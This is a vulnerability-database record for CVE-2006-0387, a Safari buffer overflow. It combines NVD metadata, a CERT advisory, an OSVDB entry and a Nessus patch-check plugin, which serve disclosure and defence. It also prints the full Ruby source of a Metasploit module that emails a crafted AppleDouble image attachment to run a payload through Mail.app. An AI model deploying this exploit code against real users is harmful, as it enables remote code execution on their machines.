ID CVE-2006-0387
Type cve
Reporter NVD
Modified 2017-07-19T21:29:42
Description
Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.
{"id": "CVE-2006-0387", "bulletinFamily": "NVD", "title": "CVE-2006-0387", "description": "Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.", "published": "2006-03-06T15:06:00", "modified": "2017-07-19T21:29:42", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "reporter": "NVD", "references": ["http://lists.apple.com/archives/security-announce/2006/Mar/msg00000.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/25032", "http://www.vupen.com/english/advisories/2006/0791", "http://www.kb.cert.org/vuls/id/176732", "http://www.securityfocus.com/bid/16907", "http://www.us-cert.gov/cas/techalerts/TA06-062A.html", "http://docs.info.apple.com/article.html?artnum=303382", "http://securitytracker.com/id?1015713"], "cvelist": ["CVE-2006-0387"], "type": "cve", "lastseen": "2017-07-20T10:49:04", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:apple:mac_os_x:10.3.4", "cpe:/o:apple:mac_os_x:10.3", "cpe:/o:apple:mac_os_x:10.3.3", "cpe:/o:apple:mac_os_x_server:10.3.8", "cpe:/o:apple:mac_os_x:10.4.3", "cpe:/o:apple:mac_os_x:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.1", "cpe:/o:apple:mac_os_x_server:10.4.5", "cpe:/o:apple:mac_os_x_server:10.4.2", "cpe:/o:apple:mac_os_x:10.3.8", "cpe:/o:apple:mac_os_x:10.4", "cpe:/o:apple:mac_os_x_server:10.3.4", "cpe:/o:apple:mac_os_x_server:10.4.4", "cpe:/o:apple:mac_os_x:10.3.2", "cpe:/o:apple:mac_os_x_server:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.6", "cpe:/o:apple:mac_os_x:10.3.9", "cpe:/o:apple:mac_os_x:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.2", "cpe:/o:apple:mac_os_x:10.4.2", 
"cpe:/o:apple:mac_os_x:10.3.1", "cpe:/o:apple:mac_os_x_server:10.3.9", "cpe:/o:apple:mac_os_x_server:10.3", "cpe:/o:apple:mac_os_x_server:10.4.3", "cpe:/o:apple:mac_os_x:10.3.6", "cpe:/o:apple:mac_os_x_server:10.3.5", "cpe:/o:apple:mac_os_x_server:10.3.3", "cpe:/o:apple:mac_os_x_server:10.4", "cpe:/o:apple:mac_os_x:10.3.5", "cpe:/o:apple:mac_os_x:10.4.5", "cpe:/o:apple:mac_os_x:10.4.4"], "cvelist": ["CVE-2006-0387"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.", "edition": 1, "enchantments": {}, "hash": "e60ac24834d590245ecbdb5d76e833b3de39a36084fe930651b7e3aa1c5fb8f0", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "fd762b7d24af26f0140ae7b4170b85ba", "key": "published"}, {"hash": "16b03575b4fe50b253981af960e7e012", "key": "description"}, {"hash": "455a6fc571b85cac1b633f2750c8bdfc", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "06e276ce1fbb72f3ae23a1dd84ff9adf", "key": "title"}, {"hash": "cb9763286da59938c3282a431bdd1ea3", "key": "cpe"}, {"hash": "96d125c53c8803351d1b766190c10318", "key": "cvelist"}, {"hash": "ad14cac1c037f54511378a53522f56ca", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c18384566a4e910b2327c9a7d59a7756", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "id": "CVE-2006-0387", "lastseen": "2016-09-03T06:24:34", "modified": "2011-03-07T21:29:55", 
"objectVersion": "1.2", "published": "2006-03-06T15:06:00", "references": ["http://lists.apple.com/archives/security-announce/2006/Mar/msg00000.html", "http://www.vupen.com/english/advisories/2006/0791", "http://www.kb.cert.org/vuls/id/176732", "http://www.securityfocus.com/bid/16907", "http://www.us-cert.gov/cas/techalerts/TA06-062A.html", "http://docs.info.apple.com/article.html?artnum=303382", "http://xforce.iss.net/xforce/xfdb/25032", "http://securitytracker.com/id?1015713"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-0387", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T06:24:34"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "cb9763286da59938c3282a431bdd1ea3"}, {"key": "cvelist", "hash": "96d125c53c8803351d1b766190c10318"}, {"key": "cvss", "hash": "956b0cce3d9454921494ef535bcdf2a4"}, {"key": "description", "hash": "16b03575b4fe50b253981af960e7e012"}, {"key": "href", "hash": "455a6fc571b85cac1b633f2750c8bdfc"}, {"key": "modified", "hash": "97427b244cbdb4c83d67569cb42be292"}, {"key": "published", "hash": "fd762b7d24af26f0140ae7b4170b85ba"}, {"key": "references", "hash": "0c8c2d9b8383e5f9d83ade3dc3d3ed1d"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "06e276ce1fbb72f3ae23a1dd84ff9adf"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c80ad30085a7297c86a77180a08a38c0ce531ead076319deefaa27d3af505356", "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2017-07-20T10:49:04"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:23637"]}, {"type": "cert", "idList": ["VU:176732"]}, {"type": "nessus", "idList": ["MACOSX_SECUPD2006-001.NASL"]}, {"type": "metasploit", 
"idList": ["MSF:EXPLOIT/OSX/EMAIL/MAILAPP_IMAGE_EXEC"]}], "modified": "2017-07-20T10:49:04"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "cpe": ["cpe:/o:apple:mac_os_x:10.3.4", "cpe:/o:apple:mac_os_x:10.3", "cpe:/o:apple:mac_os_x:10.3.3", "cpe:/o:apple:mac_os_x_server:10.3.8", "cpe:/o:apple:mac_os_x:10.4.3", "cpe:/o:apple:mac_os_x:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.1", "cpe:/o:apple:mac_os_x_server:10.4.5", "cpe:/o:apple:mac_os_x_server:10.4.2", "cpe:/o:apple:mac_os_x:10.3.8", "cpe:/o:apple:mac_os_x:10.4", "cpe:/o:apple:mac_os_x_server:10.3.4", "cpe:/o:apple:mac_os_x_server:10.4.4", "cpe:/o:apple:mac_os_x:10.3.2", "cpe:/o:apple:mac_os_x_server:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.6", "cpe:/o:apple:mac_os_x:10.3.9", "cpe:/o:apple:mac_os_x:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.2", "cpe:/o:apple:mac_os_x:10.4.2", "cpe:/o:apple:mac_os_x:10.3.1", "cpe:/o:apple:mac_os_x_server:10.3.9", "cpe:/o:apple:mac_os_x_server:10.3", "cpe:/o:apple:mac_os_x_server:10.4.3", "cpe:/o:apple:mac_os_x:10.3.6", "cpe:/o:apple:mac_os_x_server:10.3.5", "cpe:/o:apple:mac_os_x_server:10.3.3", "cpe:/o:apple:mac_os_x_server:10.4", "cpe:/o:apple:mac_os_x:10.3.5", "cpe:/o:apple:mac_os_x:10.4.5", "cpe:/o:apple:mac_os_x:10.4.4"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"cert": [{"lastseen": "2018-12-25T20:19:26", "bulletinFamily": "info", "description": "### Overview \n\nApple Safari is vulnerable to a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\n**Safari**\n\nApple [Safari](<http://www.apple.com/safari/>) is a web browser that comes with the [Mac OS X](<http://www.apple.com/macosx/>) operating system. \n \n**The Problem** \n \nApple Safari contains a stack-based buffer overflow. This vulnerability can be triggered by persuading a user to open, in Safari, a web page containing specially crafted JavaScript. \n \n--- \n \n### Impact \n\nA remote attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution \n\n**Install an update**\n\nThis issue is corrected in [Apple Security Update 2006-001](<http://docs.info.apple.com/article.html?artnum=303382>). \n \n--- \n \n**Disable JavaScript in Safari**\n\n \nFor instructions on how to disable JavaScript in Safari, please refer to the Safari section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Safari>) document. \n \n--- \n \n### Vendor Information\n\n176732\n\n### Apple Computer, Inc. 
\n\nUpdated: March 03, 2006 \n\n### Status\n\nVulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://docs.info.apple.com/article.html?artnum=303382>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23176732 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://docs.info.apple.com/article.html?artnum=303382>\n * <http://secunia.com/advisories/19064/>\n\n### Credit\n\nThis issue was reported in Apple Security Update 2006-001 \n\nThis document was written by Jeff Gennari \n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-0387](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387>) \n---|--- \n**Severity Metric:** | 17.21 \n**Date Public:** | 2006-03-02 \n**Date First Published:** | 2006-03-03 \n**Date Last Updated:** | 2006-03-03 15:02 UTC \n**Document Revision:** | 10 \n", "modified": "2006-03-03T15:02:00", "published": "2006-03-03T00:00:00", "id": "VU:176732", "href": "https://www.kb.cert.org/vuls/id/176732", "type": "cert", "title": "Apple Safari vulnerable to buffer overflow", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "description": "## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. 
However, Apple has released a patch (2006-001) to address this vulnerability.\n## References:\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=303382)\nSecurity Tracker: 1015713\n[Secunia Advisory ID:19064](https://secuniaresearch.flexerasoftware.com/advisories/19064/)\n[Related OSVDB ID: 23639](https://vulners.com/osvdb/OSVDB:23639)\n[Related OSVDB ID: 23646](https://vulners.com/osvdb/OSVDB:23646)\n[Related OSVDB ID: 23636](https://vulners.com/osvdb/OSVDB:23636)\n[Related OSVDB ID: 23640](https://vulners.com/osvdb/OSVDB:23640)\n[Related OSVDB ID: 23641](https://vulners.com/osvdb/OSVDB:23641)\n[Related OSVDB ID: 23642](https://vulners.com/osvdb/OSVDB:23642)\n[Related OSVDB ID: 23643](https://vulners.com/osvdb/OSVDB:23643)\n[Related OSVDB ID: 23648](https://vulners.com/osvdb/OSVDB:23648)\n[Related OSVDB ID: 23649](https://vulners.com/osvdb/OSVDB:23649)\n[Related OSVDB ID: 23638](https://vulners.com/osvdb/OSVDB:23638)\n[Related OSVDB ID: 23644](https://vulners.com/osvdb/OSVDB:23644)\n[Related OSVDB ID: 23645](https://vulners.com/osvdb/OSVDB:23645)\n[Related OSVDB ID: 23647](https://vulners.com/osvdb/OSVDB:23647)\nNews Article: http://www.informationweek.com/news/showArticle.jhtml;?articleID=181500394\n[CVE-2006-0387](https://vulners.com/cve/CVE-2006-0387)\n", "modified": "2006-02-28T06:02:40", "published": "2006-02-28T06:02:40", "href": "https://vulners.com/osvdb/OSVDB:23637", "id": "OSVDB:23637", "title": "Apple Safari JavaScript Processing Unspecified Overflow", "type": "osvdb", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:09:01", "bulletinFamily": "scanner", "description": "The remote host is running Apple Mac OS X, but lacks Security Update 2006-001.\n\nThis security update contains fixes for the following applications :\n\napache_mod_php automount Bom Directory Services iChat IPSec LaunchServices LibSystem loginwindow Mail rsync Safari 
Syndication", "modified": "2018-07-14T00:00:00", "id": "MACOSX_SECUPD2006-001.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20990", "published": "2006-03-02T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2006-001)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20990);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2005-2713\", \"CVE-2005-2714\", \"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3391\",\n \"CVE-2005-3392\", \"CVE-2005-3706\", \"CVE-2005-3712\", \"CVE-2005-4217\", \"CVE-2005-4504\",\n \"CVE-2006-0383\", \"CVE-2006-0384\", \"CVE-2006-0386\", \"CVE-2006-0387\", \"CVE-2006-0388\",\n \"CVE-2006-0389\", \"CVE-2006-0391\", \"CVE-2006-0395\", \"CVE-2006-0848\");\n script_bugtraq_id(16736, 16907);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2006-001)\");\n script_summary(english:\"Check for Security Update 2006-001\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote operating system is missing a vendor-supplied patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Apple Mac OS X, but lacks\nSecurity Update 2006-001.\n\nThis security update contains fixes for the following\napplications :\n\napache_mod_php\nautomount\nBom\nDirectory Services\niChat\nIPSec\nLaunchServices\nLibSystem\nloginwindow\nMail\nrsync\nSafari\nSyndication\");\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=303382\");\n script_set_attribute(attribute:\"solution\", value:\n\"Mac OS X 10.4 :\nhttp://www.apple.com/support/downloads/securityupdate2006001macosx1045ppc.html\nhttp://www.apple.com/support/downloads/securityupdate2006001macosx1045intel.html\n\nMac OS X 10.3 
:\nhttp://www.apple.com/support/downloads/securityupdate20060011039client.html\nhttp://www.apple.com/support/downloads/securityupdate20060011039server.html\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Archive Metadata Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! 
packages ) exit(0);\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-5]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2006-00[123467]|2007-003)\", string:packages)) security_hole(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-02-04T12:26:21", "bulletinFamily": "exploit", "description": "This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5.", "modified": "2017-07-24T13:26:21", "published": "2007-11-26T06:11:10", "id": "MSF:EXPLOIT/OSX/EMAIL/MAILAPP_IMAGE_EXEC", "href": "", "type": "metasploit", "title": "Mail.app Image Attachment Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mail.app Image Attachment Command Execution',\n 'Description' => %q{\n This module exploits a command execution vulnerability in the\n Mail.app application shipped with Mac OS X 10.5.0. 
This flaw was\n patched in 10.4 in March of 2007, but reintroduced into the final\n release of 10.5.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['hdm', 'kf'],\n 'References' =>\n [\n ['CVE', '2006-0395'],\n ['CVE', '2007-6165'],\n ['OSVDB', '40875'],\n ['BID', '26510'],\n ['BID', '16907']\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Payload' =>\n {\n 'Space' => 8192,\n 'DisableNops' => true,\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'ConnectionType' => '-bind -find',\n },\n },\n 'Platform' => %w{ unix osx },\n 'Targets' =>\n [\n [ 'Mail.app - Command Payloads',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'PayloadCompat' => {\n 'RequiredCmd' => 'generic perl ruby bash-tcp telnet',\n }\n }\n ],\n [ 'Mail.app - Binary Payloads (x86)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mail.app - Binary Payloads (ppc)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n }\n ],\n ],\n 'DisclosureDate' => 'Mar 01 2006'\n ))\n\n end\n\n def autofilter\n false\n end\n\n def exploit\n\n exts = ['jpg']\n\n gext = exts[rand(exts.length)]\n name = rand_text_alpha(5) + \".#{gext}\"\n data = rand_text_alpha(rand(32)+1)\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n dbl = Rex::MIME::Message.new\n dbl.header.set(\"Content-Type\", \"multipart/appledouble;\\r\\n boundary=#{dbl.bound}\")\n dbl.header.set(\"Content-Disposition\", \"inline\")\n\n # AppleDouble file version 2\n # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'\n # Real Name matches msf random generated 5 character name - (I cheated ala gsub)\n\n resfork =\n \"AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\\r\\n\" +\n \"UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n 
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\\r\\n\" +\n \"AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\\r\\n\" +\n \"7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\\r\\n\" +\n \"5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\\r\\n\" +\n \"/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\\r\\n\" +\n \"8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\\r\\n\" +\n \"9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\\r\\n\" +\n \"/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\\r\\n\" +\n \"/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\\r\\n\" +\n \"AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8\" + 
\"\\r\\n\"\n\n fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub(\"Heise.jpg\",name), \"\\r\\n\" )\n\n cid = \"<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>\"\n\n cmd = ''\n\n if (target.arch.include?(ARCH_CMD))\n cmd = Rex::Text.encode_base64(payload.encoded, \"\\r\\n\")\n else\n bin = generate_payload_exe\n cmd = Rex::Text.encode_base64(bin, \"\\r\\n\")\n end\n\n\n dbl.add_part(fork , \"application/applefile;\\r\\n name=\\\"#{name}\\\"\", \"base64\", \"inline;\\r\\n filename=#{name}\" )\n dbl.add_part(cmd , \"image/jpeg;\\r\\n x-mac-type=0;\\r\\n x-unix-mode=0755;\\r\\n x-mac-creator=0;\\r\\n name=\\\"#{name}\\\"\", \"base64\\r\\nContent-Id: #{cid}\", \"inline;\\r\\n filename=#{name}\" )\n\n msg.parts << dbl\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/email/mailapp_image_exec.rb"}]}